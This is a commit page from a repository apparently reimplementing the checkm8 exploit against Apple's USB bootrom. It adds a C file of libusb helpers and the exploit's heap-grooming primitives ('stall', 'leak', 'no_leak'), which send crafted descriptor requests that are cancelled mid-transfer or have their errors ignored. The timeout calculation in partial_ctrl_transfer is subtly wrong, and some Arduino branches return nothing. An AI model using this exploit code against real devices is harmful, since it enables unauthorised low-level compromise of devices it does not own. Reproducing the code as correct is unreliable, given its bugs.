grg/checkm8_tool
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

Began refactoring remote to include arduino support

Browse Source
This commit is contained in:
Gregor Haas
2019-12-27 16:57:50 -05:00
parent 85972de653
commit c7a882998c
11 changed files with 290 additions and 172 deletions
Download Patch File Download Diff File Expand all files Collapse all files

390
checkm8_remote/src/usb_helpers.c Normal file
View File

@@ -0,0 +1,390 @@
#include "usb_helpers.h"
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <termio.h>
#include <fcntl.h>
#include "libusbi.h"
int open_device_session(struct pwned_device *dev)
{
checkm8_debug_indent("open_device_session(dev = %p)\n", dev);
#ifdef WITH_ARDUINO
// based on https://github.com/todbot/arduino-serial/blob/master/arduino-serial-lib.c
struct termios toptions;
int ard = open(ARDUINO_DEV, O_RDWR | O_NONBLOCK);
if(ard == -1)
{
checkm8_debug_indent("\tfailed to open arduino device %s\n", ARDUINO_DEV);
return CHECKM8_FAIL_NODEV;
}
if(tcgetattr(ard, &toptions) < 0)
{
checkm8_debug_indent("\tfailed to get arduino terminal attributes\n");
return CHECKM8_FAIL_NODEV;
}
cfsetispeed(&toptions, ARDUINO_BAUD);
cfsetospeed(&toptions, ARDUINO_BAUD);
toptions.c_cflag &= ~PARENB;
toptions.c_cflag &= ~CSTOPB;
toptions.c_cflag &= ~CSIZE;
toptions.c_cflag |= CS8;
toptions.c_cflag &= ~CRTSCTS;
toptions.c_cflag |= CREAD | CLOCAL;
toptions.c_iflag &= ~(IXON | IXOFF | IXANY);
toptions.c_lflag &= ~(ICANON | ECHO | ECHOE | ISIG);
toptions.c_oflag &= ~OPOST;
toptions.c_cc[VMIN] = 0;
toptions.c_cc[VTIME] = 0;
tcsetattr(ard, TCSANOW, &toptions);
if(tcsetattr(ard, TCSAFLUSH, &toptions) < 0)
{
checkm8_debug_indent("\tfailed to set terminal attributes");
return CHECKM8_FAIL_NODEV;
}
return CHECKM8_SUCCESS;
#else
int i, usb_dev_count, ret = CHECKM8_FAIL_NODEV;
libusb_device **usb_device_list = NULL;
if(dev->bundle->ctx == NULL)
{
checkm8_debug_indent("\tbundle ctx is NULL, allocating\n");
dev->bundle->ctx = malloc(sizeof(libusb_context));
libusb_init(&dev->bundle->ctx);
}
else
{
if(dev->bundle->descriptor != NULL &&
dev->bundle->descriptor->idVendor == dev->idVendor &&
dev->bundle->descriptor->idProduct == dev->idProduct)
{
checkm8_debug_indent("\tbundle is already valid\n");
return CHECKM8_SUCCESS;
}
}
usb_dev_count = libusb_get_device_list(dev->bundle->ctx, &usb_device_list);
checkm8_debug_indent("\tfound %i USB devices\n", usb_dev_count);
dev->bundle->device = NULL;
dev->bundle->handle = NULL;
dev->bundle->descriptor = malloc(sizeof(struct libusb_device_descriptor));
for(i = 0; i < usb_dev_count; i++)
{
dev->bundle->device = usb_device_list[i];
libusb_get_device_descriptor(dev->bundle->device, dev->bundle->descriptor);
if(dev->bundle->descriptor->idVendor == dev->idVendor &&
dev->bundle->descriptor->idProduct == dev->idProduct)
{
checkm8_debug_indent("\tchecking device %i ... match!\n", i);
ret = CHECKM8_SUCCESS;
break;
}
checkm8_debug_indent("\tchecking device %i ... no match\n", i);
}
libusb_free_device_list(usb_device_list, usb_dev_count);
if(ret == CHECKM8_SUCCESS)
{
checkm8_debug_indent("\topening device and returning success\n");
ret = libusb_open(dev->bundle->device, &dev->bundle->handle);
if(ret == 0)
{
libusb_set_auto_detach_kernel_driver(dev->bundle->handle, 1);
}
else
{
checkm8_debug_indent("\tfailed to open device\n");
libusb_exit(dev->bundle->ctx);
free(dev->bundle->descriptor);
}
return ret;
}
else
{
checkm8_debug_indent("\tcould not find a matching device\n");
libusb_exit(dev->bundle->ctx);
free(dev->bundle->descriptor);
dev->bundle->ctx = NULL;
dev->bundle->device = NULL;
dev->bundle->handle = NULL;
dev->bundle->descriptor = NULL;
}
return ret;
#endif
}
int close_device_session(struct pwned_device *dev)
{
checkm8_debug_indent("close_device_session(dev = %p)\n", dev);
#ifdef WITH_ARDUINO
#else
if(dev->bundle->handle != NULL)
{
checkm8_debug_indent("\tclosing handle\n");
libusb_close(dev->bundle->handle);
dev->bundle->handle = NULL;
}
dev->bundle->device = NULL;
if(dev->bundle->ctx != NULL)
{
checkm8_debug_indent("\texiting context\n");;
libusb_exit(dev->bundle->ctx);
dev->bundle->ctx = NULL;
}
if(dev->bundle->descriptor != NULL)
{
checkm8_debug_indent("\tfreeing device descriptor\n");
free(dev->bundle->descriptor);
dev->bundle->descriptor = NULL;
}
#endif
return CHECKM8_SUCCESS;
}
int is_device_session_open(struct pwned_device *dev)
{
#ifdef WITH_ARDUINO
#else
return dev->bundle->ctx != NULL && dev->bundle->device != NULL &&
dev->bundle->handle != NULL && dev->bundle->descriptor != NULL;
#endif
}
#ifndef WITH_ARDUINO
void LIBUSB_CALL async_ctrl_transfer_cb(struct libusb_transfer *transfer)
{
checkm8_debug_indent("transfer status: %s (%i / %i)\n",
libusb_error_name(transfer->status),
transfer->actual_length,
transfer->length);
}
#endif
int partial_ctrl_transfer(struct pwned_device *dev,
unsigned char bmRequestType, unsigned char bRequest,
unsigned short wValue, unsigned short wIndex,
unsigned char *data, unsigned short data_len,
unsigned int timeout)
{
checkm8_debug_indent(
"partial_ctrl_transfer(dev = %p, bmRequestType = %i, bRequest = %i, wValue = %i, wIndex = %i, data = %p, data_len = %i, timeout = %i)\n",
dev, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout);
#ifdef WITH_ARDUINO
#else
struct timeval start, end;
unsigned char usb_transfer_buf[8 + data_len];
int ret;
gettimeofday(&start, NULL);
struct libusb_transfer *usb_transfer = libusb_alloc_transfer(0);
libusb_fill_control_setup(usb_transfer_buf, bmRequestType, bRequest, wValue, wIndex, data_len);
memcpy(&usb_transfer_buf[8], data, data_len);
libusb_fill_control_transfer(usb_transfer, dev->bundle->handle, usb_transfer_buf, async_ctrl_transfer_cb, NULL, 1);
checkm8_debug_indent("\tsubmiting urb\n");
ret = libusb_submit_transfer(usb_transfer);
if(ret != 0)
{
checkm8_debug_indent("\tfailed to submit async USB transfer: %s\n", libusb_error_name(ret));
libusb_free_transfer(usb_transfer);
return CHECKM8_FAIL_XFER;
}
while(1)
{
gettimeofday(&end, NULL);
if((1000000 * end.tv_sec + end.tv_usec) - (1000000 * end.tv_sec + start.tv_usec) > timeout)
{
ret = libusb_cancel_transfer(usb_transfer);
if(ret != 0)
{
checkm8_debug_indent("\tfailed to cancel async USB transfer: %s\n", libusb_error_name(ret));
return CHECKM8_FAIL_XFER;
}
return CHECKM8_SUCCESS;
}
}
#endif
}
int no_error_ctrl_transfer(struct pwned_device *dev,
unsigned char bmRequestType, unsigned char bRequest,
unsigned short wValue, unsigned short wIndex,
unsigned char *data, unsigned short data_len,
unsigned int timeout)
{
checkm8_debug_indent(
"no_error_ctrl_transfer(dev = %p, bmRequestType = %i, bRequest = %i, wValue = %i, wIndex = %i, data = %p, data_len = %i, timeout = %i)\n",
dev, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout);
#ifdef WITH_ARDUINO
#else
int ret;
unsigned char recipient = bmRequestType & 3u;
unsigned char rqtype = bmRequestType & (3u << 5u);
if(recipient == 1 && rqtype == (2u << 5u))
{
unsigned short interface = wIndex & 0xFFu;
ret = libusb_claim_interface(dev->bundle->handle, interface);
if(ret > 0)
{
checkm8_debug_indent("\tfailed to claim interface: %s\n", libusb_error_name(ret));
return CHECKM8_FAIL_XFER;
}
}
ret = libusb_control_transfer(dev->bundle->handle, bmRequestType, bRequest, wValue, wIndex, data, data_len,
timeout);
checkm8_debug_indent("\tgot error %s but ignoring\n", libusb_error_name(ret));
return CHECKM8_SUCCESS;
#endif
}
int ctrl_transfer(struct pwned_device *dev,
unsigned char bmRequestType, unsigned char bRequest,
unsigned short wValue, unsigned short wIndex,
unsigned char *data, unsigned short data_len,
unsigned int timeout)
{
#ifdef WITH_ARDUINO
// TODO
#else
return libusb_control_transfer(dev->bundle->handle,
bmRequestType, bRequest,
wValue, wIndex,
data, data_len,
timeout);
#endif
}
static unsigned char data_0xA_0xC0_buf[192] =
{
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA
};
static unsigned char data_0xA_0xC1_buf[193] =
{
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
0xA
};
static unsigned char data_0x0_0x40_buf[64] =
{
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0
};
static unsigned char data_0x0_0x41_buf[65] =
{
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0
};
static unsigned char data_0x0_0xC0_buf[192] =
{
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0
};
int stall(struct pwned_device *dev)
{
return partial_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0xA_0xC0_buf, 0xC0, 1);
}
int leak(struct pwned_device *dev)
{
no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0xC0_buf, 0xC0, 1);
return CHECKM8_SUCCESS;
}
int no_leak(struct pwned_device *dev)
{
no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0xA_0xC1_buf, 0xC1, 1);
return CHECKM8_SUCCESS;
}
int usb_req_stall(struct pwned_device *dev)
{
unsigned char data[0];
no_error_ctrl_transfer(dev, 0x2, 3, 0, 0x80, data, 0, 10);
return CHECKM8_SUCCESS;
}
int usb_req_leak(struct pwned_device *dev)
{
no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0x40_buf, 0x40, 1);
return CHECKM8_SUCCESS;
}
int usb_req_no_leak(struct pwned_device *dev)
{
no_error_ctrl_transfer(dev, 0x80, 6, 0x304, 0x40A, data_0x0_0x41_buf, 0x41, 1);
return CHECKM8_SUCCESS;
}